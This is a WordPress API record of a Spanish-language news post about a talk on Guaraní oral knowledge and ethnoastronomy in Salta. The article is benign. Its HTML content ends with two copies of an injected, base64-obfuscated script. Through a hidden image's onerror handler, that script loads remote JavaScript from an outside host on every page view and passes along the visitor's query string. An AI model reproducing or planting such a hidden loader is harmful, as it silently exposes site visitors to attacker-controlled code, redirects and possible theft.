{"id":4075,"date":"2024-06-04T10:22:12","date_gmt":"2024-06-04T13:22:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4075"},"modified":"2025-08-13T23:55:02","modified_gmt":"2025-08-14T02:55:02","slug":"pueblos-originarios-manana-se-realizara-un-conversatorio-sobre-oralidad-y-saberes-comunitarios-guaranies","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4075","title":{"rendered":"Pueblos Originarios: ma\u00f1ana se realizar\u00e1 un conversatorio sobre oralidad y saberes comunitarios Guaran\u00edes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-fb202a2f5ff2698683fedfef5c3c15d5\" style=\"background-color:#8f0956\"><em>Este evento cultural y acad\u00e9mico reunir\u00e1 a investigadores y productores de saberes de tradici\u00f3n oral guaran\u00ed para fomentar el di\u00e1logo intercultural e interdisciplinario.<\/em><\/h4>\n\n\n\n<p>Hoy&nbsp;martes 4 de junio, se llevar\u00e1 a cabo un enriquecedor conversatorio titulado \u00ab<strong>Oralidad y Construcci\u00f3n Colaborativa de Saberes con Comunidades Guaran\u00edes<\/strong>\u00ab. Este evento se realizar\u00e1 de 17&nbsp;a 19&nbsp;horas en la peatonal La Florida 20.<\/p>\n\n\n\n<p>El conversatorio abordar\u00e1 temas de gran relevancia cultural, como la escritura, las etnograf\u00edas, el territorio y la cr\u00edtica, y contar\u00e1 con la participaci\u00f3n de investigadores y productores de saberes de tradici\u00f3n oral de comunidades guaran\u00edes. El objetivo principal es fomentar el di\u00e1logo intercultural e interdisciplinario, compartiendo experiencias y conocimientos que permitan una mayor comprensi\u00f3n y valoraci\u00f3n de la riqueza cultural guaran\u00ed.<\/p>\n\n\n\n<p>Durante el evento, se presentar\u00e1 la cartilla \u00abEtnoastronom\u00eda guaran\u00ed en el NOA: reinterpretaci\u00f3n de la luna por las mujeres yaguarogu\u0268\u00bb, un trabajo que pone en relieve la cosmovisi\u00f3n y los conocimientos astron\u00f3micos de las comunidades guaran\u00edes del Noroeste Argentino, especialmente desde la perspectiva de las mujeres yaguarogu\u0268.<\/p>\n\n\n\n<p>Esta actividad es una oportunidad \u00fanica para sumergirse en la sabidur\u00eda ancestral y contempor\u00e1nea de los pueblos guaran\u00edes, y para participar en un espacio de intercambio que busca enriquecer nuestras perspectivas culturales y cient\u00edficas. Te esperamos para compartir juntos esta valiosa experiencia.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/pueblos-originarios-maniana-se-realizara-un-conversatorio-sobre-oralidad-y-saberes-comunitarios-guaranies-95954\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este evento cultural y acad\u00e9mico reunir\u00e1 a investigadores y productores de saberes de tradici\u00f3n oral guaran\u00ed para fomentar el di\u00e1logo intercultural e interdisciplinario. Hoy&nbsp;martes 4 de junio, se llevar\u00e1 a cabo un enriquecedor conversatorio titulado \u00abOralidad y Construcci\u00f3n Colaborativa de Saberes con Comunidades Guaran\u00edes\u00ab. Este evento se realizar\u00e1 de 17&nbsp;a 19&nbsp;horas en la peatonal La [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4076,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-4075","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4075"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4075"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4075\/revisions"}],"predecessor-version":[{"id":6773,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4075\/revisions\/6773"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4076"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4075"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4075"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4075"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}